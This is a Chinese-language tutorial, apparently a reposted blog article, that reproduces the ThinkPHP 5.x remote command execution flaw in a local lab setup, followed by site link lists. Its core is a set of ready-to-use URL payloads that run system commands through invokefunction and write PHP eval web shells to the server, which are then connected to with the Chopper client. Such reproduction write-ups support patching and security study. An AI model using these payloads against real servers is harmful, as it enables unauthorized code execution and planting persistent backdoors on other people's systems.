thinkphp远程代码执行教程(ThinkPHP 5.x远程命令执行漏洞复现)
thinkphp远程代码执行教程
ThinkPHP 5.x远程命令执行漏洞复现一、漏洞描述
2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:
https://blog.thinkphp.cn/869075
漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。
二、漏洞影响版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
三、漏洞复现
1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public
3、利用system函数远程命令执行
Payload如下:
- ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4、通过phpinfo函数查看phpinfo()的信息
Payload如下:
- ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5、写入shell
Payload如下:
- ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。
6、查看是否成功写入shell
7、菜刀连接
8、第二种的写入shell的方法
Payload如下:
- ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9、查看是否成功写入文件
10、菜刀连接
总结
以上所述是小编给大家介绍的ThinkPHP 5.x远程命令执行漏洞复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对我们网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!
原文链接:https://www.cnblogs.com/yuzly/p/11460285.html
- 织梦cms漏洞怎么解决(织梦cms、帝国cms、PHPcms优缺点解析)
- dedecms提示怎么去除(DEDECMS系统后台会员功能漏洞解决方法)
- dedecms替代方案(DedeCMS投票模块漏洞解决方法)
- dedecms漏洞防范(浅析DedeCMS投票模块漏洞的解决方法)
- dedecms安全补丁(防止Dedecms入侵、漏洞问题的4点安全防范建议)
- 织梦cms漏洞大全(织梦CMS利用php正则让文章的外链自动加nofollow)
- 宝塔面板网站搭建没锁定文件(宝塔面板曝出严重安全漏洞!站长需赶紧升级到最新版本)
- nginx过滤器漏洞(Nginx反爬虫策略,防止UA抓取网站)
- dedecms授权协议(360提示DedeCms全局变量覆盖漏洞临时解决方法)
- python网络爬虫案例实战(python爬取cnvd漏洞库信息的实例)
- web安全漏洞怎么解决(Web服务器常见8种安全漏洞)
- docker的漏洞(一次docker错误的耗时排查过程记录)
- thinkphp远程代码执行教程(ThinkPHP 5.x远程命令执行漏洞复现)
- dedecms屏蔽规则(织梦dedecms修改任意管理员漏洞处理方法)
- vmware vcenter怎么用安全(关于Vmware vcenter未授权任意文件上传漏洞CVE-2021-21972的问题)
- php防sql注入(万能密码的SQL注入漏洞其PHP环境搭建及防御手段)
- 必看 8月,相比七夕,更需要注意的是这些事(必看8月相比七夕)
- 8月23日11时16分将迎处暑,逐渐进入气象意义上的秋天(8月23日11时16分将迎处暑)
- 花不语 下 如果重来一次的话,你还会这么选择吗(花不语下如果重来一次的话)
- 城市记忆之上海 最难忘的是老弄堂里的市井味道(城市记忆之上海)
- 太鸡贼了,这老小区轻松搞定了停车问题(这老小区轻松搞定了停车问题)
- 太鸡贼了,这老小区轻松搞定了停车问题(这老小区轻松搞定了停车问题)
热门推荐
- dedecms 数据转移(dedecms5.7 通过替换文件升级后 所有档案列表为空的解决方法)
- phpsession如何用(如何解决PHP获取不到SESSION信息之一般情况)
- 哪些属性可以具体描述css盒模型(浅谈CSS中盒模型的理解)
- 搭建ftp服务器操作步骤(浅谈FTP服务器架设的两种方法)
- sqlsever查看视图数据类型(SQL Sever查询语句大全集锦)
- idea的tomcat怎么关闭(解决Idea的tomcat启动报多个listener的错误问题)
- 香港免费虚拟主机(香港虚拟主机租用要怎么选择?)
- css中id和类的区别(CSS新增的:where和:is伪类函数是什么)
- sql server清理日志(SQL Server 2008 清空删除日志文件瞬间缩小日志到几M)
- laravel初始化(Laravel 登录后清空COOKIE的操作方法)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9